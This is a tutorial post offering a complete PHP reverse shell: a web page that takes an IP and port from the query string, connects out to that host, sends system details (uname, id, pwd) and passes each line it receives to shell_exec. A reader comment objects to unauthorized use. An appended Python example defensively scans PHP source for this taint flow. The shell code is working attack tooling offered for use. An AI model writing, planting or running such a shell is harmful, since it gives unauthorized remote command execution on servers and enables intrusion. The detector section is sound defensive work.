A back connect shell, also known as a reverse shell, is a piece of code used to host a shell on the server or the victim. Instead of sitting there and listening for connections (as in the case of a bind shell), it connects back to the attacker's machine. I already explained the difference between a bind shell and a reverse shell here. In this tutorial we'll be making a back connect shell in PHP.

Code: back-connect.php

```php
<?php
/*********************
@@author   : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email    : lionaneesh@gmail.com
********************/
ini_set('max_execution_time',0);
?>
<html>
<head>
<title>Back Connect Shell -- PHP</title>
</head>
<body>
<h1>Welcome to Back Connect Control Panel </h1>
<p> Fill in the form Below to Start the Back Connect Service </p>
<?php
if( isset($_GET['port']) &&
    isset($_GET['ip']) &&
    $_GET['port'] != "" &&
    $_GET['ip'] != ""
  )
{
    echo "<p>The Program is now trying to connect!</p>";
    // The connect-back target comes straight from the query string;
    // nothing on this page authenticates the caller.
    $ip = $_GET['ip'];
    $port=$_GET['port'];
    $sockfd=fsockopen($ip , $port , $errno, $errstr );
    if($errno != 0)
    {
        echo "<font color='red'><b>$errno</b> : $errstr</font>";
    }
    else if (!$sockfd)
    {
        $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
    }
    else
    {
        // Banner written to the remote end once the connection is up
        fputs ($sockfd ,
            "\n=================================================================\n" .
            " Back Connect in PHP\n Coded by lionaneesh\n" .
            " @@author : lionaneesh @@facebook : facebook.com/lionaneesh @@Email : lionaneesh@gmail.com " .
            "\n=================================================================");
        // Host information sent ahead of the prompt
        $pwd = shell_exec("pwd");
        $sysinfo = shell_exec("uname -a");
        $id = shell_exec("id");
        $dateAndTime = shell_exec("time /t & date /T");
        $len = 1337;
        fputs($sockfd ,$sysinfo . "\n" );
        fputs($sockfd ,$pwd . "\n" );
        fputs($sockfd ,$id ."\n\n" );
        fputs($sockfd ,$dateAndTime."\n\n" );
        // Each line read from the socket is passed to shell_exec()
        // and the output is written back over the same socket.
        while(!feof($sockfd))
        {
            $cmdPrompt ="(Shell)[$]> ";
            fputs ($sockfd , $cmdPrompt );
            $command= fgets($sockfd, $len);
            fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
        }
        fclose($sockfd);
    }
}
else
{
?>
<table align="center" >
<form method="GET">
<td>
<table style="border-spacing: 6px;">
<tr>
<td>Port</td>
<td>
<input style="width: 200px;" name="port" value="31337" />
</td>
</tr>
<tr>
<td>IP </td>
<td><input style="width: 100px;" name="ip" size='5' value="127.0.0.1"/>
</tr>
<tr>
<td>
<input style="width: 90px;" class="own" type="submit" value="Connect back :D!"/>
</td>
</tr>
</table>
</td>
</form>
</tr>
</table>
<p align="center" style="color: red;" >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
}
?>
```

It's as easy as a couple of clicks to make it work and to use!

Here is a screenshot of it working:

Enj0y! And don't forget to comment!

Hi, I don't agree with the unauthorized usage of PHP on people's servers, even when your posted code is old and can be found with Google in a few seconds, but you should protect the file with a password to keep those bots from entering some viagra site as the IP. Or else you can prevent Google from viewing this page... this only if you want to restrict usage to those who know the URL to the file.
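
From the defender's side, the PHP posted above has a recognisable data flow: a request parameter becomes the `fsockopen()` target, and lines read from that socket reach `shell_exec()`. The static triage check below is an added example, not part of the original post or the comment; it flags that flow in PHP source with regex-based taint tracking, and its finding names, regexes and the two sample snippets are constructed for illustration.

```python
import re

# Constructed sample: the post's connect-back flow, reduced to the lines that carry data.
SAMPLE_SHELL = r'''<?php
$ip = $_GET['ip']; $port=$_GET['port'];
$sockfd=fsockopen($ip , $port , $errno, $errstr );
$command= fgets($sockfd, $len);
fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
'''
# Constructed benign sample: fixed host and fixed command, no attacker-controlled flow.
SAMPLE_BENIGN = r'''<?php
$fp = fsockopen("mail.example.org", 25, $errno, $errstr);
$banner = fgets($fp, 512);
$uptime = shell_exec("uptime");
'''

REQUEST = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\b')
CONNECT = re.compile(r'\b(?:p?fsockopen|stream_socket_client|socket_connect)\s*\(([^;]*)', re.I)
READ = re.compile(r'\b(?:fgets|fread|fgetc|stream_get_line|socket_read)\s*\(([^;]*)', re.I)
EXEC = re.compile(r'\b(?:shell_exec|exec|system|passthru|popen|proc_open)\s*\(([^;]*)', re.I)
ASSIGN = re.compile(r'(\$\w+)\s*=(?!=)\s*([^;]*);')
VAR = re.compile(r'\$\w+')

def mentions(expr, names):
    return bool(names & set(VAR.findall(expr)))

def tainted_vars(src, seed):
    """Variables assigned from an expression `seed` accepts, or from one that mentions a tainted variable."""
    tainted = set()
    while True:
        new = {v for v, e in ASSIGN.findall(src)
               if v not in tainted and (seed(e) or mentions(e, tainted))}
        if not new:
            return tainted
        tainted |= new

def scan(src):
    """Return the set of findings for one PHP source string."""
    handles = {v for v, e in ASSIGN.findall(src) if CONNECT.search(e)}
    reads_socket = lambda e: any(mentions(a, handles) for a in READ.findall(e))
    from_request = tainted_vars(src, REQUEST.search)
    from_socket = tainted_vars(src, reads_socket)
    findings = set()
    if any(REQUEST.search(a) or mentions(a, from_request) for a in CONNECT.findall(src)):
        findings.add("connect-to-request-supplied-host")
    if any(mentions(a, from_socket) or reads_socket(a) for a in EXEC.findall(src)):
        findings.add("exec-of-socket-data")
    return findings
```

The check over-approximates (any expression that mentions a tainted variable taints its target), so a hit is a reason to review the file rather than a verdict.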